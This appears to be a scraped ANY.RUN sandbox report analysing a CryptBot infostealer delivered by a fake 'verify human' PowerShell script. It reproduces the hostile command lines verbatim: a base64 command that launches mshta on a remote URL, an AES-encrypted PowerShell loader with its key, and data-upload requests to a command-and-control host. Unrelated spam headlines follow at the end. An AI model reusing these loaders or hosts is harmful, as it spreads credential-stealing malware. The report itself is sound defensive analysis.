Malware analysis verifyhuman476.b-cdn.net.ps1 Malicious activity | ANY.RUN - Malware Sandbox Online (2024)

Table of Contents
verifyhuman476.b-cdn.net.ps1 9433ED9D985D6F93E0A168C417B7F01C 16F4FB0839CFB4D008537D87906AEE0621646C27 3:VSJJLNyAmarBanfknMVpvF7HMV20RtkpfhAi11H6Bto2kO7Heh:snyuW5VpvF7HMEvpfhJDH6ByDO7Hs MALICIOUS SUSPICIOUS INFO Behavior graph Process information Modification events Dropped files HTTP requests Connections DNS requests Threats References

File name:

verifyhuman476.b-cdn.net.ps1

Full analysis: https://app.any.run/tasks/3585f0a7-2500-47c5-9993-50b2c6f68c61
Verdict: Malicious activity
Threats:

CryptBot is an advanced Windows-targeting infostealer delivered via pirate sites with "cracked" software. It has been first observed in the wild in 2019.

Malware Trends Tracker>>>

Analysis date: August 08, 2024, 18:36:24
OS: Windows 10 Professional (build: 19045, 64 bit)
Tags:

stealer

cryptbot

Indicators:
MIME: text/plain
File info: ASCII text, with no line terminators
MD5:

9433ED9D985D6F93E0A168C417B7F01C

SHA1:

16F4FB0839CFB4D008537D87906AEE0621646C27

SHA256:
SSDEEP:

3:VSJJLNyAmarBanfknMVpvF7HMV20RtkpfhAi11H6Bto2kO7Heh:snyuW5VpvF7HMEvpfhJDH6ByDO7Hs

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Changes powershell execution policy (Unrestricted)

      • mshta.exe (PID: 7096)

    • Uses AES cipher (POWERSHELL)

      • powershell.exe (PID: 6164)

    • Gets or sets the initialization vector for the symmetric algorithm (POWERSHELL)

      • powershell.exe (PID: 6164)

    • Gets or sets the symmetric key that is used for encryption and decryption (POWERSHELL)

      • powershell.exe (PID: 6164)

    • Run PowerShell with an invisible window

      • powershell.exe (PID: 6164)

    • Bypass execution policy to execute commands

      • powershell.exe (PID: 6400)

    • Scans artifacts that could help determine the target

      • mshta.exe (PID: 7096)

    • Dynamically loads an assembly (POWERSHELL)

      • powershell.exe (PID: 6164)

    • Downloads the requested resource (POWERSHELL)

      • powershell.exe (PID: 6164)

    • Connects to the CnC server

      • svchost.exe (PID: 2256)
      • ShowbizFender.pif (PID: 7108)

    • CRYPTBOT has been detected (SURICATA)

      • svchost.exe (PID: 2256)
      • ShowbizFender.pif (PID: 7108)

    • Actions looks like stealing of personal data

      • ShowbizFender.pif (PID: 7108)

  • SUSPICIOUS

    • Starts POWERSHELL.EXE for commands execution

      • powershell.exe (PID: 6400)
      • mshta.exe (PID: 7096)

    • Application launched itself

      • powershell.exe (PID: 6400)

    • Process drops legitimate windows executable

      • mshta.exe (PID: 7096)
      • powershell.exe (PID: 6164)

    • Drops the executable file immediately after the start

      • mshta.exe (PID: 7096)
      • powershell.exe (PID: 6164)
      • Setup.exe (PID: 6444)
      • more.com (PID: 1360)

    • Probably obfuscated PowerShell command line is found

      • mshta.exe (PID: 7096)

    • BASE64 encoded PowerShell command has been detected

      • powershell.exe (PID: 6400)

    • The process bypasses the loading of PowerShell profile settings

      • mshta.exe (PID: 7096)

    • Cryptography encrypted command line is found

      • powershell.exe (PID: 6164)

    • Base64-obfuscated command line is found

      • powershell.exe (PID: 6400)

    • Executable content was dropped or overwritten

      • mshta.exe (PID: 7096)
      • powershell.exe (PID: 6164)
      • Setup.exe (PID: 6444)
      • more.com (PID: 1360)

    • Extracts files to a directory (POWERSHELL)

      • powershell.exe (PID: 6164)

    • Writes data into a file (POWERSHELL)

      • powershell.exe (PID: 6164)

    • Gets or sets the security protocol (POWERSHELL)

      • powershell.exe (PID: 6164)

    • Gets file extension (POWERSHELL)

      • powershell.exe (PID: 6164)

    • Starts application with an unusual extension

      • Setup.exe (PID: 6444)
      • more.com (PID: 1360)

    • Drops a file with a rarely used extension (PIF)

      • more.com (PID: 1360)

    • Searches for installed software

      • ShowbizFender.pif (PID: 7108)

  • INFO

    • Checks proxy server information

      • mshta.exe (PID: 7096)
      • powershell.exe (PID: 6164)

    • Reads Internet Explorer settings

      • mshta.exe (PID: 7096)

    • Gets data length (POWERSHELL)

      • powershell.exe (PID: 6164)

    • Disables trace logs

      • powershell.exe (PID: 6164)

    • Checks whether the specified file exists (POWERSHELL)

      • powershell.exe (PID: 6164)

    • Checks if a key exists in the options dictionary (POWERSHELL)

      • powershell.exe (PID: 6164)

    • Checks supported languages

      • Setup.exe (PID: 6444)
      • more.com (PID: 1360)
      • StrCmp.exe (PID: 6280)
      • ShowbizFender.pif (PID: 7108)

    • Creates files or folders in the user directory

      • Setup.exe (PID: 6444)

    • Reads the computer name

      • Setup.exe (PID: 6444)
      • StrCmp.exe (PID: 6280)
      • more.com (PID: 1360)
      • ShowbizFender.pif (PID: 7108)

    • The executable file from the user directory is run by the Powershell process

      • Setup.exe (PID: 6444)

    • Create files in a temporary directory

      • more.com (PID: 1360)
      • Setup.exe (PID: 6444)

    • Reads the machine GUID from the registry

      • ShowbizFender.pif (PID: 7108)

    • Reads CPU info

      • ShowbizFender.pif (PID: 7108)

Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the

full report

No Malware configuration.

No data.

Malware analysis verifyhuman476.b-cdn.net.ps1 Malicious activity | ANY.RUN - Malware Sandbox Online (1)Malware analysis verifyhuman476.b-cdn.net.ps1 Malicious activity | ANY.RUN - Malware Sandbox Online (2)Malware analysis verifyhuman476.b-cdn.net.ps1 Malicious activity | ANY.RUN - Malware Sandbox Online (3)Malware analysis verifyhuman476.b-cdn.net.ps1 Malicious activity | ANY.RUN - Malware Sandbox Online (4)Malware analysis verifyhuman476.b-cdn.net.ps1 Malicious activity | ANY.RUN - Malware Sandbox Online (5)

All screenshots are available in the full report

All screenshots are available in the

full report

Total processes

141

Monitored processes

13

Malicious processes

8

Suspicious processes

Behavior graph

Click at the process to see the details

Process information

PID

CMD

Path

Indicators

Parent process

6400"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep bypass C:\Users\admin\AppData\Local\Temp\verifyhuman476.b-cdn.net.ps1C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeexplorer.exe

User:

admin

Company:

Microsoft Corporation

Integrity Level:

MEDIUM

Description:

Windows PowerShell

Exit code:

Version:

10.0.19041.1 (WinBuild.160101.0800)

Modules

Images

c:\windows\system32\windowspowershell\v1.0\powershell.exe

c:\windows\system32\ntdll.dll

c:\windows\system32\kernel32.dll

c:\windows\system32\kernelbase.dll

c:\windows\system32\msvcrt.dll

c:\windows\system32\oleaut32.dll

c:\windows\system32\msvcp_win.dll

c:\windows\system32\ucrtbase.dll

c:\windows\system32\combase.dll

c:\windows\system32\rpcrt4.dll

6408\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.exepowershell.exe

User:

admin

Company:

Microsoft Corporation

Integrity Level:

MEDIUM

Description:

Console Window Host

Exit code:

Version:

10.0.19041.1 (WinBuild.160101.0800)

Modules

Images

c:\windows\system32\conhost.exe

c:\windows\system32\ntdll.dll

c:\windows\system32\kernel32.dll

c:\windows\system32\kernelbase.dll

c:\windows\system32\msvcp_win.dll

c:\windows\system32\ucrtbase.dll

c:\windows\system32\shcore.dll

c:\windows\system32\msvcrt.dll

c:\windows\system32\combase.dll

c:\windows\system32\rpcrt4.dll

6808"C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -eC bQBzAGgAdABhACAAaAB0AHQAcABzADoALwAvAG0AaQBjAHIAbwBzAG8AZgB0AGMAYQBtAHAALQB2ADEALgBiAC0AYwBkAG4ALgBuAGUAdAAvAG0AaQBjAHIAbwAtAHYAMQA=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe

User:

admin

Company:

Microsoft Corporation

Integrity Level:

MEDIUM

Description:

Windows PowerShell

Exit code:

Version:

10.0.19041.1 (WinBuild.160101.0800)

Modules

Images

c:\windows\system32\windowspowershell\v1.0\powershell.exe

c:\windows\system32\ntdll.dll

c:\windows\system32\kernel32.dll

c:\windows\system32\kernelbase.dll

c:\windows\system32\msvcrt.dll

c:\windows\system32\oleaut32.dll

c:\windows\system32\msvcp_win.dll

c:\windows\system32\ucrtbase.dll

c:\windows\system32\atl.dll

c:\windows\system32\combase.dll

7096"C:\WINDOWS\system32\mshta.exe" https://microsoftcamp-v1.b-cdn.net/micro-v1C:\Windows\System32\mshta.exepowershell.exe

User:

admin

Company:

Microsoft Corporation

Integrity Level:

MEDIUM

Description:

Microsoft (R) HTML Application host

Exit code:

Version:

11.00.19041.1 (WinBuild.160101.0800)

Modules

Images

c:\windows\system32\mshta.exe

c:\windows\system32\ntdll.dll

c:\windows\system32\kernel32.dll

c:\windows\system32\kernelbase.dll

c:\windows\system32\msvcrt.dll

c:\windows\system32\advapi32.dll

c:\windows\system32\sechost.dll

c:\windows\system32\rpcrt4.dll

c:\windows\system32\bcrypt.dll

c:\windows\system32\wldp.dll

6164"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function RbIcrhkL($BaAb){return -split ($BaAb -replace '..', '0xf7f81a39-5f63-5b42-9efd-1f13b5431005amp; ')};$VKDfBkU = RbIcrhkL('85A404998110A9B127996F55BC4B1907DC089B83BB9B1DAC52D8CBBC2ED3F6D11509B3B31537DC46634623F14FB0F67752928B758F24315559E415CA90EB186270949D05D91CAEA5F312F1BE0260286495DEDA82CE6665A23F7492FCFEAA108B5755AFF0B19A55BA09958B07294C43B2C224542BD5E2E54C4C0003BE10AE276CF90A33C14F831D7BCFC167EFD1798287ADE0CF5E405D525FD0C9943385E6EA894A1EBA87F018AEEEBF26E92F9E0B13891CA85D6739844BD64D5C1A3336F4F5FA2A25C1462B312B536DB9322BC90F6759C6B14E1F0775110AB1DE2D068A6EC4BB97BD4A4E5BEF83649C24A3F25C7FD3E8467A1FB775B8D4E935D129CC8C8CAA3F36E2196058B335F010D3CCC9A4DB0C6D0B616D299D2346BDE8CD750D6E11AA2964429F3D8590AD2F196D827D1D95F5354C592F318A9D7E620B916B624C55DC35D29869F40BC2113C8D752065EDD25013ACE24DE01A2F02DC8B2F25F1414669C61A57A575A70EC787731B9D96A058C56F3AD5A630CEFF58D454E31788D32A853BAD17157EC26B3F74C939B4D262913CB58E725FEB8FA036499ED040CC5FD5C935D0B0E29A92C55D05B4442E225F8FFDC6174442607F1FD54D0E225308A362A6DBE2121DD5EA1924DDAD760820DE66CEBC7DE10D61E0566887CA11184D47D56866685EB9418B6F52AD9D59BBDB9BE243369EBA2B0336B60F21632B01DED431C90B803CB0E0273F7FB8D4F4ED8771BB221F65EF6FE5180E541041E3B1672DA9F2B9485D7C80CDCB152C82D0A5819D860F702FB54B4609EC1ECC1DC12612594BE9079A3876F7A768078BB0F90F1C4CFB44B4794982F45A8B298E4F2BB763757EC5477EAB04067FC2F6E68805CC8353324FA9A76EEF1A5B2F360E15A96825604519C6F1D70FAA5BF351D915CB4BD709093FC9B3BC7576CE48312D98ABABB77FBC59ADE7EA06B47091FA1D46102F809628D8D44C28D9CBD489C78975ABB65E8B88D2AFB36B56CEA87A7F265C3BF16C73A868E328B40EC7E5E29EC6469CB959F7DA0AC45657FC80F52B9AF786494CCBE36EB8F744B30B5471C47D7D0F37F8A17DF3F0FC4486DFF44BFDE2DC14A3B1A49C4D59DD6D1EAA251B608A610232D5B0A99B87D3E4E0293E34FA0CC028A1B67D629AEDF0ECA62AF87D1086B5F8BB58FD14097190F4DCE5B0C34B5BF29BF3DC2B88EA1996768B30462F610035533AFC214CFE48E599893A51753E1D8E915BD2E417AD91CD12CE84FAF73116150334B9E097D88F1CA12AD7857F2143F67B0776BAEE2C0DB3B995DC4B9FB882256A1539FBBA816FA8EA9A3BB2A6F85523D55F612F19758494E071FB5923D4AEE6B09A355A23E9192ECC93989B551E9F7C64EEB243F8003DE47749DC247F036D7A5C9D0F20A6199641257CA44FABDBD9F74FDF0F03BBC3D5A617FB7183C6CB05B9812F01C377D66DEEB4F334EA2AA43739E46E960A403049F49EEEE3CA935CC0940CE4BE8F94CEEF9D3FD9580CE04FCC70CA70E4B2111E831CE49DD767220517672F417CE9A0B099D05B5382DA0C378CD4DC6C5583C31D0EC457C725C6B41F6DB412638D8EFBAC82E9ABD4A197865AA85D5C06E62FE8E4DFBEDD29CD1A352EBD91E73BF0D271E986BA56EF3DA36B572CA061414FBE30F2818936E76098B9DCFB07040A7678ED4BE468E093B2A363894FF70A37E45C07A5FE43D756035936BAAD9413F922CFF4C878188C759B3243A2268E0ED805788B83D813D6DD442D4FDEB4783398015FBDE2A555A5E2BCEF3D77FD45D058C4A8F611D4D93D572972660F757468E1E29B2F3201C84A49C1A12D1E57E03017A98124271CD2F3CA476DDC0383E8457642A1966A098930A333F10FAA6265689D61B9C081F132D285A9AB854A93674CB956DBBD5063CF01CD0B9690D9946480AA4A300E003015BAFCE8C61A68D4FE21C75A161CBB044BDA8C9595DECDC6B5F9BD186E015F4460CFAF0F2658D7EF02CA12E44C98E592D577802B14784B82DA8F8EBE3D103BB4DE3B4845FA150520926820887A26598EA7');$vkWTG = [System.Security.Cryptography.Aes]::Create();$vkWTG.Key = RbIcrhkL('6B644D67514D625170774950714F5359');$vkWTG.IV = New-Object byte[] 16;$FDxCnWus = $vkWTG.CreateDecryptor();$QHPEsJoUj = $FDxCnWus.TransformFinalBlock($VKDfBkU, 0, $VKDfBkU.Length);$rfPIxZhDh = [System.Text.Encoding]::Utf8.GetString($QHPEsJoUj);$FDxCnWus.Dispose();& $rfPIxZhDh.Substring(0,3) $rfPIxZhDh.Substring(3)C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exemshta.exe

User:

admin

Company:

Microsoft Corporation

Integrity Level:

MEDIUM

Description:

Windows PowerShell

Exit code:

Version:

10.0.19041.1 (WinBuild.160101.0800)

Modules

Images

c:\windows\system32\windowspowershell\v1.0\powershell.exe

c:\windows\system32\ntdll.dll

c:\windows\system32\kernel32.dll

c:\windows\system32\kernelbase.dll

c:\windows\system32\msvcrt.dll

c:\windows\system32\oleaut32.dll

c:\windows\system32\msvcp_win.dll

c:\windows\system32\ucrtbase.dll

c:\windows\system32\atl.dll

c:\windows\system32\combase.dll

460\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.exepowershell.exe

User:

admin

Company:

Microsoft Corporation

Integrity Level:

MEDIUM

Description:

Console Window Host

Exit code:

Version:

10.0.19041.1 (WinBuild.160101.0800)

Modules

Images

c:\windows\system32\conhost.exe

c:\windows\system32\ntdll.dll

c:\windows\system32\kernel32.dll

c:\windows\system32\kernelbase.dll

c:\windows\system32\msvcp_win.dll

c:\windows\system32\ucrtbase.dll

c:\windows\system32\shcore.dll

c:\windows\system32\msvcrt.dll

c:\windows\system32\combase.dll

c:\windows\system32\rpcrt4.dll

6476C:\WINDOWS\System32\rundll32.exe C:\WINDOWS\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -EmbeddingC:\Windows\System32\rundll32.exesvchost.exe

User:

admin

Company:

Microsoft Corporation

Integrity Level:

MEDIUM

Description:

Windows host process (Rundll32)

Exit code:

Version:

10.0.19041.1 (WinBuild.160101.0800)

Modules

Images

c:\windows\system32\rundll32.exe

c:\windows\system32\ntdll.dll

c:\windows\system32\kernel32.dll

c:\windows\system32\kernelbase.dll

c:\windows\system32\msvcrt.dll

c:\windows\system32\combase.dll

c:\windows\system32\ucrtbase.dll

c:\windows\system32\rpcrt4.dll

c:\windows\system32\shcore.dll

c:\windows\system32\imagehlp.dll

6444"C:\Users\admin\AppData\Local\Temp\Setup.exe" C:\Users\admin\AppData\Local\Temp\Setup.exepowershell.exe

User:

admin

Company:

Florian Heidenreich

Integrity Level:

MEDIUM

Description:

Mp3tag - the universal Tag editor

Exit code:

1

Version:

3.26.0.0

Modules

Images

c:\users\admin\appdata\local\temp\setup.exe

c:\windows\system32\ntdll.dll

c:\windows\system32\kernel32.dll

c:\windows\system32\kernelbase.dll

c:\windows\system32\shlwapi.dll

c:\windows\system32\msvcrt.dll

c:\windows\system32\user32.dll

c:\windows\system32\win32u.dll

c:\windows\system32\gdi32.dll

c:\windows\system32\gdi32full.dll

6280C:\Users\admin\AppData\Roaming\lv_op\SPSTDKDRMQDIWOTNDVPR\StrCmp.exeC:\Users\admin\AppData\Roaming\lv_op\SPSTDKDRMQDIWOTNDVPR\StrCmp.exeSetup.exe

User:

admin

Company:

aaa

Integrity Level:

MEDIUM

Version:

1.00

Modules

Images

c:\users\admin\appdata\roaming\lv_op\spstdkdrmqdiwotndvpr\strcmp.exe

c:\windows\system32\ntdll.dll

c:\windows\syswow64\ntdll.dll

c:\windows\system32\wow64.dll

c:\windows\system32\wow64win.dll

c:\windows\system32\wow64cpu.dll

c:\windows\syswow64\kernel32.dll

c:\windows\syswow64\kernelbase.dll

c:\windows\syswow64\apphelp.dll

c:\windows\syswow64\msvbvm60.dll

1360C:\WINDOWS\SysWOW64\more.comC:\Windows\SysWOW64\more.comSetup.exe

User:

admin

Company:

Microsoft Corporation

Integrity Level:

MEDIUM

Description:

More Utility

Exit code:

Version:

10.0.19041.1 (WinBuild.160101.0800)

Modules

Images

c:\windows\syswow64\more.com

c:\windows\system32\ntdll.dll

c:\windows\syswow64\ntdll.dll

c:\windows\system32\wow64.dll

c:\windows\system32\wow64win.dll

c:\windows\system32\wow64cpu.dll

c:\windows\syswow64\kernel32.dll

c:\windows\syswow64\kernelbase.dll

c:\windows\syswow64\msvcrt.dll

c:\windows\syswow64\ulib.dll

See Also
PowerShell Gallery | Public/User/ConvertTo-Shared.ps1 0.9.203News - Abwärtskompatibilität: Mehr Spiele der Xbox 1 auf der Xbox One"mr wrestling 2" 3D Models to Print - yeggi

Total events

24506

Read events

24473

Write events

33

Delete events

Modification events

(PID) Process:(7096)mshta.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:ProxyBypass

Value:

1

(PID) Process:(7096)mshta.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:IntranetName

Value:

1

(PID) Process:(7096)mshta.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:UNCAsIntranet

Value:

1

(PID) Process:(7096)mshta.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:AutoDetect

Value:

(PID) Process:(7096)mshta.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content
Operation:writeName:CachePrefix

Value:

(PID) Process:(7096)mshta.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies
Operation:writeName:CachePrefix

Value:

Cookie:

(PID) Process:(7096)mshta.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History
Operation:writeName:CachePrefix

Value:

Visited:

(PID) Process:(6164)powershell.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
Operation:writeName:EnableFileTracing

Value:

(PID) Process:(6164)powershell.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
Operation:writeName:EnableAutoFileTracing

Value:

(PID) Process:(6164)powershell.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
Operation:writeName:EnableConsoleTracing

Value:

Executable files

14

Suspicious files

16

Text files

6

Unknown types

Dropped files

PID

Process

Filename

Type

7096mshta.exeC:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\07CEF2F654E3ED6050FFC9B6EB844250_3431D4C539FB2CFCB781821E9902850Dbinary

MD5:51883DF11BA0F75D2AAD9E88EBD057DC

SHA256:1CC443E507D740FEDC646DCA7116EEAD8084ED9B7C70ABBB34281DD1E7DBBA10

7096mshta.exeC:\Users\admin\AppData\Local\Microsoft\Windows\INetCache\IE\AH8CR9J5\micro-v1[1]executable

MD5:DE219CB5F5073BE86D74F4BEE29D9E79

SHA256:0581756A656ACE2E7D164B1F66846E9D079755BD7A5CEAD72E73B53AB534531B

6400powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_xrid0nuv.un3.psm1text

MD5:D17FE0A3F47BE24A6453E9EF58C94641

SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7

6164powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_jmqnz03m.03m.ps1text

MD5:D17FE0A3F47BE24A6453E9EF58C94641

SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7

6164powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_vtasglp0.4rb.psm1text

MD5:D17FE0A3F47BE24A6453E9EF58C94641

SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7

6808powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_qiw3vsdx.vos.psm1text

MD5:D17FE0A3F47BE24A6453E9EF58C94641

SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7

6808powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_05pqx1ea.0uz.ps1text

MD5:D17FE0A3F47BE24A6453E9EF58C94641

SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7

6164powershell.exeC:\Users\admin\AppData\Local\Temp\K1.zipcompressed

MD5:F0E4E16FEB8B7B8E95D81A7F5807164B

SHA256:AD12C4695218510096F7B75E699A106F877D378B66DD11F86783AC2C40B432C8

6164powershell.exeC:\Users\admin\AppData\Local\Temp\caramel.epsbinary

MD5:E94BB41E97E1D8E1EAA638191A74490A

SHA256:F59A54633E14187EEB907F91C747D0E8B6FB5A970B9CDDED15800B487F20239A

6400powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_b2y0hfgw.k42.ps1text

MD5:D17FE0A3F47BE24A6453E9EF58C94641

SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7

Download PCAP, analyze network streams, HTTP content and a lot more at the

full report

HTTP(S) requests

10

TCP/UDP connections

49

DNS requests

24

Threats

HTTP requests

PID

Process

Method

HTTP Code

IP

URL

CN

Type

Size

Reputation

7096

mshta.exe

GET

200

172.64.149.23:80

http://ocsp.sectigo.com/MFIwUDBOMEwwSjAJBgUrDgMCGgUABBRDC9IOTxN6GmyRjyTl2n4yTUczyAQUjYxexFStiuF36Zv5mwXhuAGNYeECEQCb80pEPlZ04x2fAu4YLy1O

unknown

unknown

6572

backgroundTaskHost.exe

GET

200

192.229.221.95:80

http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQ50otx%2Fh0Ztl%2Bz8SiPI7wEWVxDlQQUTiJUIBiV5uNu5g%2F6%2BrkS7QYXjzkCEAn5bsKVVV8kdJ6vHl3O1J0%3D

unknown

unknown

6600

backgroundTaskHost.exe

GET

200

192.229.221.95:80

http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQ50otx%2Fh0Ztl%2Bz8SiPI7wEWVxDlQQUTiJUIBiV5uNu5g%2F6%2BrkS7QYXjzkCEAn5bsKVVV8kdJ6vHl3O1J0%3D

unknown

unknown

7096

mshta.exe

GET

200

104.18.38.233:80

http://ocsp.usertrust.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTNMNJMNDqCqx8FcBWK16EHdimS6QQUU3m%2FWqorSs9UgOHYm8Cd8rIDZssCEH1bUSa0droR23QWC7xTDac%3D

unknown

unknown

7096

mshta.exe

GET

200

104.18.38.233:80

http://ocsp.comodoca.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBRTtU9uFqgVGHhJwXZyWCNXmVR5ngQUoBEKIz6W8Qfs4q8p74Klf9AwpLQCEDlyRDr5IrdR19NsEN0xNZU%3D

unknown

unknown

1124

svchost.exe

GET

200

192.229.221.95:80

http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAJ0LqoXyo4hxxe7H%2Fz9DKA%3D

unknown

unknown

5336

SearchApp.exe

GET

200

192.229.221.95:80

http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTrjrydRyt%2BApF3GSPypfHBxR5XtQQUs9tIpPmhxdiuNkHMEWNpYim8S8YCEAI5PUjXAkJafLQcAAsO18o%3D

unknown

unknown

7108

ShowbizFender.pif

POST

200

185.173.38.84:80

http://cveight8ht.top/v1/upload.php

unknown

unknown

7108

ShowbizFender.pif

POST

200

185.173.38.84:80

http://cveight8ht.top/v1/upload.php

unknown

unknown

7108

ShowbizFender.pif

POST

200

185.173.38.84:80

http://cveight8ht.top/v1/upload.php

unknown

unknown

Download PCAP, analyze network streams, HTTP content and a lot more at the

full report

Connections

PID

Process

IP

Domain

ASN

CN

Reputation

1860

svchost.exe

20.73.194.208:443

settings-win.data.microsoft.com

MICROSOFT-CORP-MSN-AS-BLOCK

NL

whitelisted

3888

svchost.exe

239.255.255.250:1900

whitelisted

2120

MoUsoCoreWorker.exe

20.73.194.208:443

settings-win.data.microsoft.com

MICROSOFT-CORP-MSN-AS-BLOCK

NL

whitelisted

20.73.194.208:443

settings-win.data.microsoft.com

MICROSOFT-CORP-MSN-AS-BLOCK

NL

whitelisted

4

System

192.168.100.255:138

whitelisted

3260

svchost.exe

40.113.103.199:443

client.wns.windows.com

MICROSOFT-CORP-MSN-AS-BLOCK

NL

whitelisted

1124

svchost.exe

40.126.32.140:443

login.live.com

MICROSOFT-CORP-MSN-AS-BLOCK

NL

unknown

5336

SearchApp.exe

184.86.251.23:443

www.bing.com

Akamai International B.V.

DE

unknown

1124

svchost.exe

192.229.221.95:80

ocsp.digicert.com

EDGECAST

US

whitelisted

5336

SearchApp.exe

192.229.221.95:80

ocsp.digicert.com

EDGECAST

US

whitelisted

DNS requests

Domain

IP

Reputation

settings-win.data.microsoft.com

  • 20.73.194.208
  • 4.231.128.59

whitelisted

google.com

  • 142.250.186.110

whitelisted

client.wns.windows.com

  • 40.113.103.199

whitelisted

login.live.com

  • 40.126.32.140
  • 20.190.160.17
  • 40.126.32.134
  • 40.126.32.74
  • 40.126.32.68
  • 20.190.160.22
  • 40.126.32.76
  • 20.190.160.20

whitelisted

www.bing.com

  • 184.86.251.23
  • 184.86.251.14
  • 184.86.251.10
  • 184.86.251.27
  • 184.86.251.24
  • 184.86.251.9
  • 184.86.251.5
  • 184.86.251.22
  • 184.86.251.11

whitelisted

ocsp.digicert.com

  • 192.229.221.95

whitelisted

microsoftcamp-v1.b-cdn.net

  • 169.150.247.33

unknown

ocsp.comodoca.com

  • 104.18.38.233
  • 172.64.149.23

whitelisted

th.bing.com

  • 184.86.251.25
  • 184.86.251.9
  • 184.86.251.28
  • 184.86.251.14
  • 184.86.251.23
  • 184.86.251.11
  • 184.86.251.22
  • 184.86.251.4
  • 184.86.251.24

whitelisted

ocsp.usertrust.com

  • 104.18.38.233
  • 172.64.149.23

whitelisted

Threats

PID

Process

Class

Message

2256

svchost.exe

Potentially Bad Traffic

ET DNS Query to a *.top domain - Likely Hostile

2256

svchost.exe

A Network Trojan was detected

ET MALWARE Cryptbot CnC DGA Domain (eight8)

7108

ShowbizFender.pif

Potentially Bad Traffic

ET INFO HTTP Request to a *.top domain

7108

ShowbizFender.pif

A Network Trojan was detected

ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4

7108

ShowbizFender.pif

A Network Trojan was detected

ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4

7108

ShowbizFender.pif

A Network Trojan was detected

ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4

No debug info

Malware analysis verifyhuman476.b-cdn.net.ps1 Malicious activity | ANY.RUN - Malware Sandbox Online (2024)

References

Top Articles
Curtain Bangs: Face Shape, Maintenance, Styling | IPSY
Curly Hairstyles: Easy and Fast for a Flawless Look
Swimgs Yuzzle Wuzzle Yups Wits Sadie Plant Tune 3 Tabs Winnie The Pooh Halloween Bob The Builder Christmas Autumns Cow Dog Pig Tim Cook’s Birthday Buff Work It Out Wombats Pineview Playtime Chronicles Day Of The Dead The Alpha Baa Baa Twinkle
Weeminuche Smoke Signal
How To Get Free Credits On Smartjailmail
Tiger Island Hunting Club
Craigslist Chautauqua Ny
2016 Hyundai Sonata Price, Value, Depreciation & Reviews | Kelley Blue Book
Breakroom Bw
The most iconic acting lineages in cinema history
Conan Exiles Thrall Master Build: Best Attributes, Armor, Skills, More
No Hard Feelings Showtimes Near Cinemark At Harlingen
Craigslist Blackshear Ga
Nba Rotogrinders Starting Lineups
Teenleaks Discord
Eva Mastromatteo Erie Pa
Nail Salon Goodman Plaza
Apply for a credit card
Aaa Saugus Ma Appointment
Laveen Modern Dentistry And Orthodontics Laveen Village Az
The BEST Soft and Chewy Sugar Cookie Recipe
Jeffers Funeral Home Obituaries Greeneville Tennessee
Two Babies One Fox Full Comic Pdf
Uncovering The Mystery Behind Crazyjamjam Fanfix Leaked
Valic Eremit
Essence Healthcare Otc 2023 Catalog
Violent Night Showtimes Near Amc Dine-In Menlo Park 12
